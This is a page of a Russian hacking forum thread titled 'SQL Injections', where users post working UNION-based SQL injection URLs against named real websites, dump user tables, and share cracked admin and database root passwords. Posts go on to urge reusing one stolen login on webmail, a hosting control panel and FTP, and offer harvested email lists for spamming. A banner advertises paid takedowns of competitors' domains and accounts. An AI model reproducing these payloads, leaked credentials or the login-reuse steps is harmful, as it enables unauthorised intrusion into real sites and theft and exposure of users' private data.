Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 147 из 1242

147

Опции темы

Поиск в этой теме

Опции просмотра

#1461

30.03.2007, 04:39

Joker-jar

Постоянный

Регистрация: 11.03.2007

Сообщений: 581

Провел на форуме:
4172659

Репутация: 646

Отправить сообщение для Joker-jar с помощью ICQ

Код:

http://www.cybersquads.ru/articles/categories.php?arttype=-1'+union+select+1,2,3,4,5,6,7,8,concat(name,'%20:%20',password,'%20:%20',email,'%20:%20',icq,'%20:%20',homepage),10,11,12,13+from+users+limit+100/*

#1462

30.03.2007, 09:52

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,concat(uname,0x3a,pass),4,5,6,7,8,9+from+users+limit+1,1/*

логин:пасс

#1463

30.03.2007, 10:56

Joker-jar

Постоянный

Регистрация: 11.03.2007

Сообщений: 581

Провел на форуме:
4172659

Репутация: 646

Код:

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=1'

Подробности ошибки не выдает

#1464

30.03.2007, 12:02

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://b-s.com.ua/cgi-bin/catalog.pl?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12+from+zakaz/*

to Joker-jar

Код:

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),Char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*

Последний раз редактировалось Grey; 30.03.2007 в 12:15..

#1465

30.03.2007, 12:15

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

2 Grey & Joker-jar

Код:

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+gorod_users/*

с именами столбцов, думаю, вы разберетесь

#1466

30.03.2007, 14:31

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.2msk.ru/?module=food&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*

#1467

30.03.2007, 14:58

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

http://www.selfserviceworld.com/article.php?id=-16816%20union%20select%20id,concat_ws(char(58),nam e,email,password),3,4,5,6,7,8%20from%20users/*

admin:dbcc4a47bc32b0e84903c632fb0dc08c => admin:lackawanna

Цитата:

http://www.selfserviceworld.com/article.php?id=-16816%20union%20select%201,concat(user,char(58),pa ssword),3,4,5,6,7,8%20from%20mysql.user/*

root:54a43983056d0aa5 => root:f00bar
Админка - /admin. Залогиниться не могу ((

Идем дальше:

Цитата:

http://www.mcpost.com/article.php?id=-295%20union%20select%201,2,id,concat(username,char (58),password),5,6,7,8,9,0,11,12%20from%20users/*

mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((

И спам листы если кому нужны:

Цитата:

http://www.fdr.com.ua/article.php?id=-3888%20union%20select%201,concat(name,char(58),ema il),3,4,5,6,7,8%20from%20forum/*

#1468

30.03.2007, 15:34

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Цитата:

Сообщение от kamaz

mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((

можно в webmail зайти

Код:

http://www.mcpost.com/webmail

а можно и в Control Panel хостера)

Код:

https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index

логин/пасс те же

Последний раз редактировалось n1†R0x; 30.03.2007 в 15:38..

#1469

30.03.2007, 16:15

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

Цитата:

Сообщение от n1†R0x

можно в webmail зайти

Код:

http://www.mcpost.com/webmail

а можно и в Control Panel хостера)

Код:

https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index

логин/пасс те же

+ ftp

Код:

ftp://mcpost:0489hbc@mcpost.com

+++++

Код:

http://www.sader.org.tr/uyeler_detay.asp?id=2189768%20union%20select%200,ad,2,email,url,resim,firma,unvan,8,adres,telefon,fax,12,13,14,15,16,17%20from%20uyeler%20where%20id=ID

меняем ID и инфо.
панели нетy или вроде ето только Members

Последний раз редактировалось Muhacir; 30.03.2007 в 16:24..

#1470

30.03.2007, 16:42

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Код:

http://www.hurriyetusa.com/haber/haber_detay.asp?id=973068465%20union%20select%200,1,2,3,4,5,6,7,8%20from%20admin

Help

Код:

http://www.panasonic.com.tr/urun_detay.asp?proid=633'%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20users

помогите со 2 ым

Последний раз редактировалось Muhacir; 30.03.2007 в 17:06..

Страница 147 из 1242

147

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход